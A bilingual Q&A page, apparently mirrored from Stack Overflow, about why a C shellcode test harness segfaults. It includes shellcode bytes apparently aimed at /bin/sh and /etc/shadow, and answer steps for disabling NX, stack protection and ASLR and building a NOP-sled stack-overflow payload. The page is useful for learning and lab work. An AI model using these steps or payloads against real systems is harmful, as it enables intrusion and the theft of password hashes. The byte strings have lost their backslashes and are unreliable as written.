Shellcode 没有运行 [英] Shellcode not running
问题描述
我尝试通过 C 程序运行很多 shell 代码来测试它们.在这里
I've tried to run a lot of shell-codes via C program to test them. Here it is
#include<stdio.h>
#include<string.h>
unsigned char code[] = "shell here";
main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
这里是shellcode的例子
And here's example of shellcode
"x31xc0xb0x46x31xdbx31xc9xcdx80xeb"
"x16x5bx31xc0x88x43x07x89x5bx08x89"
"x43x0cxb0x0bx8dx4bx08x8dx53x0cxcd"
"x80xe8xe5xffxffxffx2fx62x69x6ex2f"
"x73x68x58x41x41x41x41x42x42x42x42"
(incat etcshadow)运行后
(incat etcshadow) After running
gcc sctest.c -o out./out
它只是给了我 shellcode 长度和分段错误我已经尝试了很多不同的 shellcode,但一切都给了我段错误我的dmesg |尾-1[18440.783383] 测试[8768]:8049700 ip 08049700 sp bffff2ec 测试中的错误 15 [8049000+1000] 的段错误我的 shellcode 有什么问题?
It's just gives me shellcode length and Segmentation Fault I've already tried a lot of different shellcodes but everything just gives me segfault My dmesg | tail -1 [18440.783383] test[8768]: segfault at 8049700 ip 08049700 sp bffff2ec error 15 in test[8049000+1000] What's wrong with my shellcodes?
推荐答案
在禁用 NX-bit 和其他类似 randomize_va_space 的东西后,我终于做到了.
After disabling NX-bit and other things like randomize_va_space I've finally done it.
首先你应该使用 -z execstack 和 -fno-stack-protector 键编译你的可执行文件.
Firstly you should compile your executable with keys -z execstack and -fno-stack-protector.
之后禁用 ASLR echo 0 >/proc/sys/kernel/randomize_va_space.现在你必须找到shellcode.您可以尝试 mspayload 或 msfvenom.Shellcode 是一个字节码,通常会为您提供 shell.
After that disable ASLR echo 0 > /proc/sys/kernel/randomize_va_space. Now you have to find shellcode. You can try mspayload or msfvenom. Shellcode is a bytecode which usually gives you shell.
在该步骤中,您应该找到堆栈溢出的偏移量.您可以尝试查找类似
On that step you should find offset for your stack overflow. You can try to find lines like
sub hex-offset, %esp
或者您可以尝试使用简单的脚本(例如 ./your_binary <python -c "print('A')*n") 其中 n 是你的偏移量
Or you can try to bruteforce it with simple script like ./your_binary < python -c "print('A')*n") where n is your offset
找到偏移后(SEGFAULT 发生并且 dmesg | tail -1 说 %eip 是 0x41414141)你只需要编写你的漏洞利用.它的结构是这样的
After finding offset(SEGFAULT occurs and dmesg | tail -1 says that %eip is 0x41414141) you just need to write your exploit. It's structure looks like that
NOPs(no operation)*x+shellcode+return-address(4 bytes)*y
len(shellcode)+x+4y=你的偏移量返回地址是堆栈中 NOP 所在位置的地址(输入前在 gdb info r 中看到的 %esp 地址)
len(shellcode)+x+4y=your offset Where return address is an address of the place in the stack where your NOPs are located(address of %esp which you see in gdb info r before input)
并且不要忘记,如果没有 gdb,在 gdb 中工作的漏洞利用将无法工作,因为您需要从返回地址中添加/减去 36 个字节.
And don't forget that exploit which works in gdb won't work without gdb because you need to add/substract 36 bytes from your return address.
终于可以利用了
./your_binary < exploit.bin
这篇关于Shellcode 没有运行的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!